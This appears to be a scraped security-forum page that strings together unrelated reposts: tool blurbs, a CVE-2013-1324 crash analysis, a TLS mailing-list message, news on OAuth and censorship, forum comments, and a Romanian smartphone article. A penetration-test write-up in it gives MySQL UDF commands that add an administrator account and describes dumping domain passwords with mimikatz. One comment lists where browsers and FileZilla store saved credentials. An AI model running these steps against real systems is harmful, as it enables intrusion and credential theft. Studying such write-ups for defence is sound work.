from wave files. JavaScript slide show skeleton 0.1 a simple JavaScript example for animating many sequential image files. Webpostmem 0.1 (webpostmem) This tool can be used to check the POST attacks on webservers as for example memory and sockets that are not freed if the client sends less data than how much specified in Content-Lenght. It is the same proof-of-concept I have used for the bugs in Goahead webserver, NULLhttpd and WWW Fileshare Pro. Q3huffdecenc 0.2 (q3huffdecenc) compress and uncompress the files containing the "connect" packets of the games that use the Quake 3 engine. Q3sendenc 0.2.1 (q3sendenc) this tool gets a custom file specified by the user, compress it using the Huffman compression, sends it to a server based on the Quake 3 engine and then waits for a reply. It also calculates the challenge, the protocol and the punkbuster parameters just to make a successful login with the server. it could be useful for who wants to test the Quake 3 engine and its possible flaws. Custom GIF creator 0.1 (gifbug) a very simple tool to create GIF files with customized headers. HLspfed 0.1.1a (hlspfed) Half-Life single-proxy forwarder with encoding/decoding functions. This tool is a packets forwarder (datapipe) for Half-Life that lets you to modify, manipulate and insert any type of data you want in the packets exchanged between the Half-Life server and the client. ut2003fits 0.1 (ut2003fits) UT2003 fake information test server: this tool can be used to send custom information to the clients that search for multiplayer games (very funny if used when the real UT2003 server is running). this simple tool can be used in a lot of modes. For example you can launch UT2003heartbeat and then launching UT2003fits you will see all the players that are online because every player that goes in the multiplayer section of UT2003 will automatically request information to all the servers available and you can log all these players (for example for statistical purposes). Half-Life testing server 0.1.2 (hlts) this server answers to the Half-Life queries. It supports: ping, infostring, details, getchallenge, players, rules, challenge rcon and connect. UT2003 heartbeat emulator 0.1 (ut2003heartbeat) heartbeat protocol emulator for UT2003. With this little code you can add your IP address to the official Epic UT2003 servers list (epicgames.com and demo-all.txt). HERE there is the explanation of the protocol. Quake 3 testing server 0.3 (q3ts) this server answers to the Quake 3 queries. It supports: getstatus, getinfo, getchallenge, connect (with real-time decompression), rcon and disconnect. It supports the infoResponse of Quake 3 arena 1.32, Soldier of Fortune 2 1.03 GOLD, Return to Castle Wolfenstein 1.41, Medal of Honor: Allied Assault 1.11. Browser's headers viewer simple unfiltered php script to see all the headers sent by your browser (useful to check the anonimity of a proxy for example) Sursa: Luigi Auriemma

blueflower blueflower is a simple tool that looks for secrets such as private keys or passwords in a file structure. Interesting files are detected using heuristics on their names and on their content. Unlike some forensics tools, blueflower does not search in RAM, and does not attempt to identify cryptographic keys or algorithms in binaries. DISCLAIMER: This program is under development. It may not work as expected and it may destroy your computer. Use at your own risk. Features multithreading detection of various key and password containers (SSH, Apple keychain, Java KeyStore, etc.) and other interesting files (Bitcoin wallets, PGP policies, etc.) detection of encrypted containers (Truecrypt, PGP Disks, GnuPG files, etc.) search in the content of the following types of files: text/* MIME-typed files archives RAR, tar, ZIP compressed files bzip2, gzip encrypted containers/archives: PGP/GPG, Truecrypt, RAR, ZIP PDF documents [*]support of nested archives and compressed files (except for nested RARs) [*]portable *nix/Windows [*]CSV output Sursa: https://github.com/veorq/blueflower

ICEcoder ICEcoder is an open-source code editor, which provides a modern approach to building websites. By allowing you to code directly within the web browser, online or offline, it means you only need one program (your browser) to develop sites, plus can test on actual web servers. After development, you can also maintain the website easily, all of which make for speedy and smart development. Because it can be web based you can use it from any internet enabled computer with a modern browser and because it's open-source, customise it to your liking, integrating with online services. If you'd like to use it as a desktop code editor, no problems, you only need PHP 5.0+ (though 5.3+ is recommeded), so you can use on Linux and on PC via MAMP or XAMPP and Mac via WAMP (or another PHP installation). ICEcoder was created because web devs (like myself) always complained their code editor didn't do exactly what they like. They're often bloated with features, slow and awkward. Conversely, ICEcoder is lightweight (zip is around 0.4mb) and boots in seconds (often 1-2s). Oh, and it's also free. Enjoy! Code editor features While it looks simplistic on the surface, ICEcoder packs a whole load of features and plugins to make coding slick & efficient. Some of the best include: use online or locally Use it online from wherever you are, but it also runs under localhost too as a desktop solution. broken tag indicators An indicator shows if you have a broken tag structures and highlights where errors occured. themes 16 highlighting themes come as standard but you can easily make your own with a CSS file. find & replace builder Find and replace can be applied to the current or all open documents, plus filenames & files. secure login ICEcoder can be setup wherever you wish and is login secured to help keep your files safe. It's multi user too! type boosters Plenty of coding assist is available such as Emmet, close tag completion and tag wrappers. nest display & selection A nesting display shows your cursor position, hover over them to highlight, click to select. linting with JS Hint as you type Your JavaScript code is linted with JS Hint as you type to ensure good coding practises. manage your MySQL databases MySQL database management is easy with the Adminer plugin. It's like phpMyAdmin, but better. Sursa: https://icecoder.net/

Owning The Enterprise With HTTP PUT During a routine penetration testing engagement, we found an IIS webserver with HTTP methods (verbs) like PUT and DELETE enabled on it. During enumeration of the web server we figured it was configured to run PHP as well. The PUT method allows an attacker to place a file on the server. Uploading a web shell was our obvious choice. However due to some security settings enabled on the server we were unable to upload any php/aspx/jsp etc. files. Had we been able to upload a shell, we would’ve gotten code execution on the server. But it was not as simple as we thought it to be. After trying some variation of the file types, we figured out we could upload .txt files on the server. We could access these files by opening them through the browser. After multiple attempts we decided to use something very simple: “MOVE”method to rename the files once they were uploaded on the server. So we uploaded a .php file as .txt and renamed that to .php The screenshot for these two steps is shown below: Here is the output when visiting our test123.php file, Safemode was enabled on the server and we didn’t really try to bypass that. But we uploaded an ASPX Shell on the server (rename the .txt file to .aspx as mentioned earlier). At this point our service was running with “Network Service”Privileges and we were limited in terms of our control on the Server. Using our ASPX webshell we were at least able to traverse the content on the server. We were able to read the MySQL configuration details for one of the applications configured on the server and noted that the database is configured using root. Armed with the credentials of the MySQL root user, we could login to the server remotely. Unlike Microsoft SQL Server there is no built-in stored procedure like xp_cmdshell that allows us to execute OS commands. However, MySQL has User Defined Functions (UDF) that can be used to execute OS level commands but they are not available by default. At this point “lib_mysqludf_sys”available on https://github.com/mysqludf comes in handy. The “lib_mysqludf_sys”library has functions to interact with the operating system. These functions allow you to interact with the execution environment in which MySQL runs. This library is available with SQLMAP (udf/mysql) Firstly, we copied the library on to the target machine in a known location using the PUT method. We had to write this file to “c:\windows\system32”directory. But our web server was running with limited privileges. While logging in we face another issue, the root user is not allowed to login remotely on the MySQL database. This was easy to overcome!We wrote a php file which allowed our IP address to login remotely on the MySQL server and executed it using the same steps that we have been doing so far. Next, we logged in and triggered a SQL query to load this file in to a newly created table row. Here, we are instructing MySQL to create a new function to point to the code in our malicious library. Finally, we executed this new function with arbitrary system commands that we wish to run. The commands used are shown below: USE mysql; CREATE TABLE npn(line blob); INSERT INTO npn values(load_files('C://root//lib_mysqludf_sys.dll')); SELECT * FROM mysql.npn INTODUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll'; CREATE FUNCTION sys_exec RETURNSintegerSONAME 'lib_mysqludf_sys_32.dll'; SELECT sys_exec("net user omair NIIConsult!n4 /add"); SELECT sys_exec("net localgroup Administrators omair /add"); As seen a user omair with administrative privileges was added to the server. Further, we logged in to the server through remote desktop. Time to escalate our privileges even further!At this stage, we were local administrator and did not have a domain account. We found multiple users logged in to the system. At this point we want to dump the passwords from the memory of that system. Mimikatz helps you do that. What is Mimikatz? Mimikatz is a slick tool that pulls plain-text passwords out of WDigest interfaced through LSASS. Read here to know more about how to use different features in Mimikatz We then uploaded “mimikatz.exe”on the server using our account omair. It was likely that the antivirus on the server would flag it. In our case it did not. Even if it did we could use various evasion techniques to upload and execute the file. We then used our favourite widgest method to retrieve passwords in clear text and get credentials for a user “taufiq” who was an ordinary Domain User but also had Admin privileges on some product related servers. Now we logged into all these product related servers with the account we had to search for more interesting accounts which we could escalate our privileges to. We were able to find several accounts but the most authoritative account was of course the Domain Admin. That’s it, we again uploaded mimiktaz on this system and obtained password for the Domain Admin account. Net result was that the Domain was 0wned! From here on we could use smbexec utility to extract domain hashes from the domain controller. Conclusion: This article shows how a simple vulnerability like enabling HTTP verbs such as PUT and MOVE can serve as the doorway to a far more insidious attack and allow the attacker to take complete ownership of the network. Of course, there were a large number of other vulnerabilities that allowed us to do this – but the entry point was simply one mis-configured HTTP server! Author: Omair Sursa: Owning The Enterprise With HTTP PUT - Checkmate

CVE-2013-1324 Microsoft Office WPD File Remote Memory Corruption Vulnerability Author: Ling Chuan Lee Vulnerable: Microsoft Office Word 2007 (12.0.4518.1014) MSO (12.0.4518.1014) Tested Platform: Windows 7 Professional WordPerfect 5 converter module used by Microsoft Office Word was vulnerable to stack buffer overflow when process a special crafted WordPerfect document with an invalid number of CSTYL border elements. In order to understand what is going on, we need to understand the file format has been used by Word Perfect. You could get a copy of Word Perfect file format from here WP6 File Format SDK In WP5.x documents, the file header is 16 bytes long. Next is the file prefix in blocks of five indexes with their relative data following each index block. F13 Research Labs identified the vulnerable WP records in variable-length multi-byte function 0xDC. The codes for variable length multi byte functions [208 (0xD0) through 239 (0xEF)] appear twice each time the function is invoked. The first occurence is the 'open gate' and the second is the 'closing gate'. Each 'open gate' is followed by a subgroup byte, a value of size short (16 bits) and a function flags byte. If the flags indicates there is prefix data associated with the function, a number of prefix ID bytes come next, followed by the prefix index-ID words. Next is a word (16 bits) showing the size of the non-deleteable information. Following the deletable data are a size word and the 'closing gate' [1]. Here is a picture representation of the generic WordPerfect 5.x File Structure: Figure 1: WordPerfect 5.x File Structure CVE-2013-1324 vulnerability is a classic stack buffer overflow that occurs when WordPerfect 5 converter module 'WPFT532.CNV' processing crafted WordPerfect file with the unusual value '0x00' and '0xAC'. Figure 2: Malformed Multi-byte Function 0xDC Figure 3: Malformed Multi-byte Function 0xDC When we looked into the execution flow, we noticed that the code at address '0x014D9315' (and eax, 7FFFh) is the instruction caused the value of total number of the loop (eax) which is writing bytes into a stack become '0x2C00'. Figure 4: The Invalid Value 0x2C00 .text:014D931A mov [ebp+var_4], eax ;[ebp-4]=0000 2c00 .text:014D931D xor eax, eax ;eax=0 .text:014D931F mov ah, [esi+1] ;ah=00 .text:014D9322 mov al, [esi] ;al=00 ...... ...... .text:014D9315 and eax, 7FFFh ;eax=0000 ac00&7FFFh=0000 2c00 As you can see from the figure below, the 'loc_14D9336' is a loop calling the function 'sub_14D89A4' which is writing bytes into a stack-defined variable with a fixed size. For each loop, the total number of the loop ([ebp+var_4]) will increase '0xFFFF' until it is equal to zero and edi represents current index from the process. This code is inside a loop and as the loop goes on, the index value will increase. The result of bounds check doesn't happen, Stack Base Pointer Register (EBP) will be overwritted in function 'sub_14D89A4' after the index of the loop (edi) hit 0x20, which leads to stack buffer overflow. Figure 4: Writing Bytes into a Stack-defined Variable with a Fixed Size Figure 5 shows the code where the overwrite of Stack Base Pointer Register (EBP) happens. As shown below, the value of '0x6a0' is the total size to write. If the user have a larger value, this WordPerfect document file may trigger the stack buffer overflow by overwriting the buffer with a bigger number. .text:014D89A4 push ebp .text:014D89A5 mov ebp, esp .text:014D89A7 push ebx .text:014D89A8 push esi .text:014D89A9 mov esi, eax ;esi=eax=0x20 counter 0x20 .text:014D89AB imul eax, 14h ;eax=20h*14h=280 .text:014D89AE imul esi, 35h ;esi=0x20*0x35=0x6a0 maximum sizeof(CSTYL)*32 .text:014D89B1 add esi, [ebp+arg_0] ;esi=6a0+0018 f200=0018 f8a0 .text:014D89B4 add eax, offset word_14E4567 ;eax=280+offset WPFT532!AbortRtfToForeign+0x12684=6a52 47e7 .text:014D89B9 push edi ;edi=20 .text:014D89BA mov [ebp+arg_0], eax ;[ebp+8]=[0018 f1e8]=6a52 47e7 .text:014D89BD mov eax, [ebp+arg_4] ;eax=[ebp+0ch]= [0018 f1ec]=00 .text:014D89C0 xor ebx, ebx ;ebx=0 .text:014D89C2 push ebx .text:014D89C3 and eax, 7 ;eax=0 .text:014D89C6 push ebx ;ebx=0 .text:014D89C7 push eax ;eax=0 .text:014D89C8 lea eax, [esi+0Ch] ;eax=0018 f8ac, [esi+0ch]=[0018 f8ac]=0000 0000 .text:014D89CB push eax ;eax=0018 f8ac .text:014D89CC call sub_14D19F6 ;ebp no overwrite .text:014D89D1 mov eax, [ebp+arg_4] ;eax=[ebp+0ch]=[0018 f1ec]=0 .text:014D89D4 push ebx ;ebx=0 .text:014D89D5 shr eax, 3 ;eax=0 .text:014D89D8 push ebx ;ebx=0 .text:014D89D9 and eax, 7 ;eax=0 .text:014D89DC push eax .text:014D89DD push esi ;esi=0018 f8a0 .text:014D89DE call sub_14D19F6 ;ebp no overwrite .text:014D89E3 mov eax, [ebp+arg_4] ;eax=[ebp+0ch]=[0018 f1ec]=0 .text:014D89E6 push ebx ;ebx=0 .text:014D89E7 shr eax, 8 ;eax=0 .text:014D89EA push ebx ;ebx=0 .text:014D89EB and eax, 7 ;eax=0 .text:014D89EE push eax .text:014D89EF lea edi, [esi+24h] ;edi=0018 f8a0+24h=0018 f8c4, [esi+24h]=[0018f8a0+24h]=6a5082a7 .text:014D89F2 push edi ;edi=20 .text:014D89F3 call sub_14D19F6 ;overwrite ebp in this routine Figure below shown the overwrite of Stack Base Pointer Register (EBP 0x0018f8b8) in function 'sub_14D19F6' and caused the memory corruption Figure 6: EBP Before Overwrite Figure 7: EBP After Overwrite The result of the EBP overwrite will caused the Microsoft Office crash when return to the previous block code. Figure 8: Microsoft Office Crash Reference: 1. WP6 File Format SDK [Download] Sursa: F13 Laboratory

[h=1][TLS] Confirming Consensus on removing RSA key Transport from TLS 1.3[/h] The discussion on this list and others supports the consensus in IETF 89 to remove RSA key transport cipher suites from TLS 1.3. The Editor is requested to make the appropriate changes to the draft on github. More discussion is needed on both DH and ECDH are used going forward and on if standard DHE parameters will be specified. Joe [For the chairs] On Mar 26, 2014, at 11:43 AM, Joseph Salowey (jsalowey) <jsalowey at cisco.com> wrote: > TLS has had cipher suites based on RSA key transport (aka "static RSA", TLS_RSA_WITH_*) since the days of SSL 2.0. These cipher suites have several drawbacks including lack of PFS, pre-master secret contributed only by the client, and the general weakening of RSA over time. It would make the security analysis simpler to remove this option from TLS 1.3. RSA certificates would still be allowed, but the key establishment would be via DHE or ECDHE. The consensus in the room at IETF-89 was to remove RSA key transport from TLS 1.3. If you have concerns about this decision please respond on the TLS list by April 11, 2014. > > Thanks, > > Joe > [Speaking for the TLS chairs] > _______________________________________________ > TLS mailing list > TLS at ietf.org > https://www.ietf.org/mailman/listinfo/tls Sursa: Re: [TLS] Confirming Consensus on removing RSA key Transport from TLS 1.3

The Censorship Effect Posted 25 minutes ago by Lydia Laurenson (@lydialaurenson) Editor’s note: Lydia Laurenson is a writer, researcher, and communications professional fascinated by social media and community dynamics. Lydia also served in the U.S. Peace Corps, working with the HIV program in Swaziland, Africa. The 29-year-old founder of VKontakte, Russia’s largest social network, just got “fired” and left the country. That is, Pavel Durov described himself as fired, although there were previous rustlings of resignation. Durov’s departure was accompanied by much commentary about the censorship climate in Russia. He himself announced that he plans to create a new social network, and that he moved because “the country is incompatible with Internet business at the moment.” This comes right on the heels of the U.S. IPO for Sina Weibo, a social platform that’s sometimes called “China’s Twitter.” Mashable recently reported that when Sina Weibo filed its IPO, it described Chinese censorship specifically as a risk factor. How much does censorship affect digital media from a business perspective? I’ve recently been researching cross-cultural social media while working on some articles for O’Reilly Media. Unsurprisingly, it’s clear that censorship has a huge impact on how social platforms develop and on how individuals use them. Some of the specific effects of censorship can be surprising, though. Ethan Zuckerman, the director of the Center for Civic Media at MIT, and other experienced commentators have argued that censorship can actually strengthen dissent when very popular sites get taken down. For example, a person who only visits YouTube for cat videos will be alerted that something big has gone wrong if YouTube is blocked, even if that person wouldn’t normally pay attention to the news. I’ve also heard tales of how censorship and its pal, propaganda, strengthen social media ties. “In China, the Internet plays a much deeper role in society because all the normal media is propaganda. You know that what’s appearing in state-run media is not objective, but something on the Internet might be,” says Thomas Crampton, the global managing director for international marketing agency Ogilvy & Mather. This is supported by other marketing reports like this one from management consulting firm McKinsey, which notes that Chinese consumers value the brand recommendations of friends, family, and social media influencers far more than American consumers do. … But Censorship Weakens Social Ties, Too However, there are plenty of situations where social media platforms are decimated by censorship. Some data crunching by the Telegraph in the U.K. showed clearly that last year’s Chinese “war on rumors” — and more importantly, the war’s associated arrests — caused Sina Weibo usage to drop off a cliff. No wonder Weibo called censorship a “risk factor” in its IPO. The writer and anthropologist Sarah Kendzior, who researches authoritarian states in Eastern Europe, has written that “In authoritarian states, the circulation of state crimes often serves to confirm tacit suspicions, and in some cases, to reaffirm the futility of the fight. Fear, apathy, cynicism and distrust are as common reactions to these quasi-revelations as are outrage and a desire for change.” “What I think is interesting is how much of the authoritarian state mentality people take when they leave the country,” Kendzior tells me. “I see the same fear and wariness about social media from people who have fled Uzbekistan, as people who are still there. It’s very hard to shake off self-censorship.” Kendzior also mentions a case from 2011 where someone, probably the Uzbekistan government, created a fake activist who only existed on social media. Then they spread the news that the activist committed suicide. This was an effective strategy to weaken ties by spreading fear, anxiety and distrust. “It means everyone’s suspicious of everyone else,” explains Kendzior. “It makes everyone wonder: Am I talking to a real person?” Protectionist and Popularization Side Effects China’s blockade on Facebook, Twitter, Google and other high-profile American platforms has arguably had some protectionist side effects for local industry. I’ve often heard China’s social media landscape compared to the Galápagos Islands — Darwin’s closed-off archipelago, which famously evolved many unique animal species due to its isolation. In other words, when China blocked most major U.S. social platforms, its government created an ecosystem where local platforms that came later to market could flourish. Censorship can carry other unexpected popularization effects, too. “Google Reader was really popular in Iran,” Jillian C. York, the director for International Freedom of Expression at the Electronic Frontier Foundation, tells me. “The reason for that was that it enabled people to read blocked websites. You can’t easily block one Google service without blocking all of them, so people in Iran could use Google Reader to read blogs that they couldn’t normally get because of censorship.” On the other hand, China’s fencing-off of American digital services has also fenced off sites that use them for account authentication. For instance, a given site may not actually be blocked in China, but it will be effectively blocked if its users have to log in via Facebook. What Do Censors Want? It’s rarely easy to figure out censors’ goals and methods, but in 2013, three Harvard researchers published some work on the problem (here’s the full PDF of the study by King, et al.). They managed to gather millions of posts on Chinese social media before the government reached them, and then they analyzed which ones were censored. Their primary finding was that the Chinese government doesn’t appear to censor criticism on social media, but it does censor social media posts encouraging collective action. In fact, the government even censored stuff that could encourage collective action around figures who the government supported! This analysis implies that the Chinese government will happily track open criticism, and that it will closely observe dissidents’ connections to each other but crack down on anyone who tries to build a power base that it can’t control. That makes some sense — although it’s worth noting that the study was published in May 2013, which was before the June “war on rumors” smack down and the subsequent arrests that eviscerated Sina Weibo’s user base. A lot of people, especially Americans like me, have strong emotional reactions to censorship. But whatever our feelings, we need to put them aside long enough to understand how and why censorship happens, especially those of us who work in the global media. We’ll see how the situation continues to develop — and how journalists, brands, and platforms adjust to it. Sursa: The Censorship Effect | TechCrunch

Major flaw found in Oauth and OpenID affects Google, Microsoft and Facebook If you login with it at your social networks, you're at risk By Chris Merriman Fri May 02 2014, 14:45 A MAJOR VULNERABILITY has been discovered in the Oauth and OpenID services designed to protect user credentials. The login tools create tokens allowing users to login to websites including Facebook, Google, and Linkedin and those owned by Microsoft, using centralised credentials, without the websites having direct access to user names or passwords. Wang Jing, a PhD student at Nanyang Technical University, Singapore discovered that by using the known "Covert Redirect" exploit, when the pop-up appears from the credential website, even though the credential website is genuine, when the victim hits "enter" the information is sent to the attacker instead of the credential website. According to Wang's blog, Tetraph, fixing the problem is going to be very difficult. He says, "The patch of this vulnerability is easier said than done. If all the third-party applications strictly adhere to using a whitelist. Then there would be no room for attacks. However, in the real world, a large number of third-party applications do not do this due to various reasons. "This makes the systems based on OAuth 2.0 or OpenID highly vulnerable." So many of the worlds biggest websites either use Oauth or provide Oauth credentials that the potential for this problem to spiral out of control is substantial. Is it another Heartbleed? Probably not, but with websites so far showing very little interest in plugging the leak, now that it is public knowledge it has the potential to become a big problem. This story is still developing. We've requested comment and will update this story as we receive more information. Sursa: Major flaw found in Oauth and OpenID affects Google, Microsoft and Facebook- The Inquirer

In afara de BitDefender unde e postat "automat", mai e TheHackerNews postat de un indian travestit. Nu vad pe cineva serios sa ia in considerare aceasta problema non-existenta. Daca cumva se puteau citi REMOTE datele respective era "leak". Asa, nici cuvantul "leak" nu e folosit adecvat. Filezilla: C:\Users\<username>\AppData\Roaming\FileZilla (*.xml) Firefox: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default (key3.db si signons.sqlite) Chrome: C:\Documents and Settings\<username>\Local Settings\Application Data\Google\Chrome\User Data\Default (Exposing the Password Secrets of Google Chrome - www.SecurityXploded.com) BRB, trimit catre site-urile de stiri descoperirile facute.

Mozilla Firefox, Google Chrome, Internet Explorer, Pidgin, FileZilla si in principal orice program care salveaza date locale are aceasta "problema de securitate". Si la OpenVPN gasesti cheile local. Si la Apache pe server ai cheia privata. Etc. Mica diferenta e ca la unele programe procesul e putin mai complicat, datele sunt cryptate cu o cheie salvata local, in timp ce la altele sunt in plaintext. Dar tot local sunt salvate si tot pot fi "leaked" cum ziceti voi de catre acele magice programe care se cheama "STEALERE". Da, cred ca ati auzit de ele. Singurele programe care nu au aceasta "problema" sunt cele care au setata o "master password".

Avem CVE: - CVE-2014-3135 : Multiple cross-site scripting (XSS) vulnerabilities in vBulletin 5.1.1 Alpha 9 allow remote attackers to inject arbitrar - https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3135

Ministerul Aprrii Nacionale - Comunicat de pres

Ministerul Ap?r?rii infirm? categoric existen?a unui proces de mobilizare a rezervi?tilor | adevarul.ro

Luptele nu se mai dau cu sabia sau cu pusca. Nu ar avea nicio logica sa fie obligatorie pentru toti barbatii. Dar sa recunoastem, nu avem tehnologia militara pentru a rezista unui razboi. „Vocea Rusiei“ love?te din nou: România nu rezist? mai mult de 30 de minute în fa?a unui r?zboi | adevarul.ro

Ar cam trebui sa ne gandim la un posibil conflict. Crimeea, Ucraina, urmeaza Republica Moldova, apoi noi.

Î?i merit? oare pre?ul un smartphone High-End? Radu Neagu 30-04-2014 Ce aduce în plus un smartphone high-end? De ce am pl?ti 3000 de lei pentru un smartphone recent ap?rut? Cu ce ne ajut? faptul c? are un ecran de 5 inci ?i nu de 3,5? ?ine bateria mai mult la un smarpthone mai scump? Cu ce m? ajut? pe mine ca utilizator un smartphone mai scump? Acestea sunt doar o parte din întreb?rile pentru care ne-am gândit s? realiz?m un astfel de material. O mic? parte, ce e drept. Mul?i dintre apropia?i ?i mul?i al?i cititori ne întreab? dac? merit? s? pl?teasc? mai mult pentru a î?i achizi?iona un smartphone mai bun, iar r?spunsul nu este niciodat? simplu. Poate fi destul de simplu s? întrebi un posibil client sau chiar ?i un prieten ”Chiar ai nevoie de el?”, îns? aceast? întrebare îi poate nedumeri ?i mai mult. De cele mai multe ori, nu avem nevoie de el, îns? îl vrem! ?i ?tim bine c?, atunci când ne dorim ceva, vom g?si cele mai bune motive s? ?i cump?r?m. Sunt multe situa?ii ?i nu exist? niciodat? un r?spuns clar pentru nici una din ele. Vom vorbi, a?adar, de clasificarea smartphone-urilor, de tehnologia care se ascunde în spatele acestora ?i despre procesul de produc?ie. Sper?m s? în?elege?i cel mai bine de ce este sau nu este un smartphone scump alegerea ideal?. Clasificare smartphone-uri Este bine s? ?tim c? smartphone-urile se clasific? în trei mari categorii: Low-End, Mainstream ?i High-End. Cele trei categorii se întrep?trund, desigur, ?i nu exist? o delimitare clar? între ele, ci mai mult una impus? de pre?ul pe care îl pl?te?te utilizatorul. La fel ca orice alt produs din industria de IT&C, smartphone-ul se caracterizeaz? prin performan?a pe care o ofer? ?i prin func?iile pe care le aduce în plus fa?? de alte modele. Segmentul Low-End este compus în primul rând din dispozitive ieftine, al c?ror pre? de retail, f?r? abonament, este pân? în jurul sumei de 600-700 lei. Aceast? limit? este impus? mai degrab? de operatorii GSM, cei care ofer? aceste dispozitive gratuit pentru abonamentele de valoare mic?. Cele mai multe au un procesor single-core sau chiar dual-core la 1-1.2 GHz, 512-768-1GB de memorie RAM ?i un display de maxim 4 inci. Aici putem discuta de rezolu?ie, pu?ine dintre aceste dispozitive ajungând la 1280×720 pixeli. Conectivitatea este desigur limitat?, nu exist? un modul NFC, nu exist? WiFi 802.11n ?i foarte pu?ine modele sunt compatibile 4G. Chiar ?i acelea sunt limitate hardware la viteze de maxim 50 Mbps. Aici b?t?lia este destul de strâns? ?i chiar ?i decizia de cump?rare este f?cut? la fa?a locului, în func?ie de oferta operatorului de telefonie. Companiile produc?toare de dispozitive au foarte multe modele în aceast? gam?. Practic, cu un astfel de dispozitiv po?i face cam orice. Po?i naviga pe internet, po?i efectua desigur apeluri, po?i juca o mul?ime de jocuri, îns? totul cu o limit?. Înc?rcarea unei pagini se face mai greu, jocurile nu func?ioneaz? toate, exist? probleme de incompatibilitate sau de rulare a acestora. Software-ul, de obicei, las? de dorit. Nokia, de exemplu, a lansat o serie de modele cu Android care nu au aproape nici o leg?tur? cu Google Android. Chiar ?i magazinul de aplica?ii este unul proprietar ?i restrictiv. Segmentul Mainstream este compus din dispozitivele al c?ror pre? este în jurul sumei maxime de 1400-1500 lei. Aici întâlnim deja ecrane mai mari, de 5 inci, chiar ?i de 5,5 sau 6 inci, procesoare Quad-Core cu frecven?e de 1.2-1.7 GHz ?i rezolu?ii chiar FullHD. Memoria RAM este tot în jurul valorii de 1 GB, pu?ine modele vin cu o cantitate de memorie de 2 GB, iar acelea sunt probabil destul de greu de g?sit. Acestea sunt dispozitivele care se reg?sesc gratuit la abonamente mai mari, iar num?rul lor este de asemenea foarte mare. Jocurile au mai pu?ine limit?ri, conectivitatea este mai bun?, întâlnim viteze 4G pân? la 100 Mbps ?i chiar ?i conectivitate WiFi 802.11ac. În acest segment intr? foarte multe modele coreene precum Huawei, ZTE, Lenovo, îns? ?i alternative de la Samsung sau LG. Desigur, aici este un segment pentru care se agit? ?i companiile române?ti precum Allview, Evolio, dar ?i al?turi de segmentul low-end. Nu pot s? spun c? sunt slabe, sunt chiar performante, îns? au o serie de minusuri. Mai exact, touchscreen-ul nu este protejat de Gorilla Glass, construc?ia lor uneori parc? nu e finisat? ?i nu sunt optimizate software atât cât ar trebui. Aici se lupt? companiile produc?toare s? vin? cu o mul?ime de variante de interfe?e de utilizare. Segmentul High-End sau “aici sunt banii dumneavostr?”. Smartphone-urile cu un pre? ce dep??e?te 2000 de lei, cele pe care le g?sim la lansare în jurul valorii de 3000-3400 lei, sunt cele la care aspir? to?i utilizatorii. Avem procesoare Quad-Core cu frecven?e de pân? la 2,5 GHz, 2 sau 3 GB memorie RAM, cea mai bun? conectivitate 4G LTE ?i memorie de stocare de 32-64 GB, care mai este ?i extensibil?. În acest segment intr? un iPhone, un HTC One M8, un Samsung Galaxy S5, un LG G2 sau LG G Pro 2, un Galaxy Note 3. Nu cred c? mai merit? men?ionat faptul c? pe aceste dispozitive avem o interfa?? similar?, cu toate op?iunile posibile, sunt compatibile ?i ruleaz? perfect orice joc din Google Play ?i asta e ?i normal. Acestea sunt dispozitivele în care s-a investit cel mai mult, atât ca proces de produc?ie cât ?i ca brand. Desigur, materialele din care sunt construite aceste dispozitive sunt unele premium, metal, aluminiu, piele fals? sau altele. Ecranul este protejat de cea mai nou? variant? de Gorilla Glass, sunt rezistente la c?z?turi sau la scufund?ri în ap?. Procesul de produc?ie La fel ca ?i la ma?ini, o mare parte din procesul de produc?ie dedicat smartphone-urilor scumpe este apoi folosit pentru a le produce pe cele mai ieftine. Marketing-ul se va duce îns? doar c?tre cele de top, acesta fiind ?i motivul pentru care la fiecare lansare de produs high-end auzim numai despre modelul scump, în reclame la TV, pe strad?, la cinema, în mall, în parc. Dac? acest smartphone va avea succes, cu siguran?? ?i celelalte modele mai ieftine ale companiei vor avea vânz?ri mai bune. În pre?ul unui smartphone high-end, sunt mai multe elemente ce trebuie luate în calcul. Avem procesul de cercetare ?i dezvoltare. Spre deosebire de un smartphone low-end, modelul de top st? mult mai mult timp pe masa designerilor pentru a fi cel mai bun. De la materiale la componente, form? ?i design, toate smartphone-urile high-end sunt tratate cu cea mai mare aten?ie. Dup? acest proces, urmeaz? cercetarea de pia??, care este mai am?nun?it? decât în cazul variantelor mai ieftine ?i mult mai agresiv?. Aici sunt implica?i anali?ti din diverse domenii, de multe ori de la agen?ii dedicate, ale c?ror cuno?tin?e sunt necesare pentru a determina dac? un produs va avea un succes sau nu. Materialele au un cost mai ridicat. Metalul sau aluminiul sunt materialele cel mai greu de prelucrat pentru smartphone-uri ?i, desigur, cele mai scumpe. Procesul actual de produc?ie pentru carcasa unui smartphone din aluminiu, cum este cazul lui HTC One M8 ?i a iPhone-ului, se realizeaz? prin ?lefuirea ?i g?urirea unui bloc de aluminiu. De aici ?i costul mai ridicat al produsului final. Pe lâng? materiale, avem cele mai puternice procesoare, cele mai fiabile dintre componente instalate, ?i cele mai performante display-uri. Acesta din urm? este cel mai scump element al unui smartphone. În cazul lui S5 ajunge la aproximativ 63 de dolari din totalul de 256 de dolari cu care este produs. Concluzie Devalorizarea unui produs electronic are loc din momentul în care acesta a ap?rut pe pia??. Pre?urile mai ridicate la început sunt menite s? acopere cheltuielile ini?iale de dezvoltare ?i pe cele de marketing aferente. De aici ?i motivul pentru care un smartphone cost? la lansare 3400 de lei, iar la câteva luni se g?se?te ?i la 2400 lei. Devalorizarea este cea mai resim?it? la produsele high-end, este unul dintre motivele pentru care nu se recomand? achizi?ia celui mai nou model, chiar în prima s?pt?mân? de la lansare. Ca r?spuns la întreb?rile de mai sus, situa?ia st? în felul urm?tor: nu exist? un singur r?spuns. E drept, un smarpthone high-end merit?, aproape din toate punctele de vedere. Totu?i, cel mai important este momentul achizi?iei. Clien?ii smartphone-ului high-end sunt de obicei tinerii, care urm?resc pia?a ?i care î?i permit aceste dispozitive ori sunt dispu?i la compromisuri pentru achizi?ie. Mai sunt mul?i utilizatori care le cump?r? doar pentru a face o declara?ie asupra statutului financiar, de?i poate nu le folosesc nici la jum?tate din capacitatea lor. Indiferent care v? este motivul, sfatul nostru este ca întotdeauna s? ave?i pu?in? r?bdare, pân? mai scade un pic pre?ul. Sursa: Î?i merit? oare pre?ul un smartphone High-End?

